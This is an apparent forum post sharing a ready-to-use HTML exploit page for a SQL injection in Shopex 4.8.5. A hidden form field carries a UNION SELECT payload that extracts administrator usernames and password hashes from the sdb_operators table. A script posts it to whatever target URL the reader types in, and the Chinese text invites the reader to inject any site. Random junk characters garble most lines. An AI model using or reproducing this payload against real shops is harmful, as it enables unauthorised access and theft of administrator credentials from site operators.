<center>
8 f; ?+ L# p7 c+ d/ G<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
8 N/ i) \( n! m7 H8 G8 O% z- s$ \2 k! u# |<form action="" method="post" name="submit_url">; \2 t8 g0 `' q* V8 P" g/ S9 L
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
8 ^( `# D' {9 H% B( k<input type="hidden" name="goods[goods_id]" value="3">
( r" m! K* f9 i<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
% U% c1 ^3 n# V- _& _$ u<input type="submit" value="给我注入" onclick=fsubmit()>, i' m& e( X0 S2 {( @0 \
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
$ G- J9 |: N: s9 c8 r h4 C
- {# p& m" c+ d, t! j/ _1 K<script> + {+ O$ Q$ U6 t+ \
function fsubmit(){
# r2 F+ {. T( \& K! c) o4 hform = document.forms[0];
8 X+ L; C6 g4 G; J( A% ~5 Bform.action = form.url.value+'/?product-gnotify';
: C7 a0 w8 V; h* e* W$ _, s& Zform.submit(); 6 \ y" Q1 u. k6 P! y8 y
}
2 ?- h- [. Q! s+ t( a( E3 @5 Q</script>
3 {5 o) w* O/ J& f2 e- i% V* u |
发表于 2013-1-23 09:20:52
收藏
支持
反对